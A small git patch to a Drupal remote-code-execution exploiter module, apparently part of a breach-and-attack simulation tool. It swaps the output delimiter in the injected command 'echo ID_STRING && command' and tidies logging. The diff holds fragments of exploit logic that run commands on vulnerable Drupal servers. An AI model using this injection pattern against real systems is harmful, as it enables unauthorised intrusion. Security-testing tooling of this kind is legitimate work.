From b82a6e48b285f8e0e3ecde79a3da3b3bd2d4ed52 Mon Sep 17 00:00:00 2001 From: ophirharpazg Date: Mon, 31 Aug 2020 17:55:04 +0300 Subject: [PATCH] use ID_STRING instead of dashes --- monkey/infection_monkey/exploit/drupal.py | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py index 06cd17e54..fa5222146 100644 --- a/monkey/infection_monkey/exploit/drupal.py +++ b/monkey/infection_monkey/exploit/drupal.py @@ -8,6 +8,7 @@ import logging import requests from urllib.parse import urljoin from infection_monkey.exploit.web_rce import WebRCE +from infection_monkey.model import ID_STRING from network.network_utils import remove_port __author__ = 'Ophir Harpaz' @@ -70,7 +71,7 @@ class DrupalExploiter(WebRCE): for node_id in node_ids: node_url = urljoin(url, str(node_id)) if self.check_if_exploitable(node_url): - self.add_vuln_url(url) # Where is this used? + self.add_vuln_url(url) # This is for report. Should be refactored in the future self.vulnerable_urls.append(node_url) if stop_checking: break @@ -114,7 +115,7 @@ class DrupalExploiter(WebRCE): def exploit(self, url, command): # pad a easy search replace output: - cmd = 'echo ---- && ' + command + cmd = f'echo {ID_STRING} && {command}' base = remove_port(url) payload = { "link": [ @@ -145,10 +146,10 @@ class DrupalExploiter(WebRCE): if check_drupal_cache(r): LOG.info(f'Exploiting {url} returned cache HIT, may have failed') - if '----' not in r.text: - LOG.info('[warn] Command execution _may_ have failed') + if ID_STRING not in r.text: + LOG.warning('Command execution _may_ have failed') - result = r.text.split('----')[-1] + result = r.text.split(ID_STRING)[-1] LOG.info(f'Drupal exploit result = {result}') return result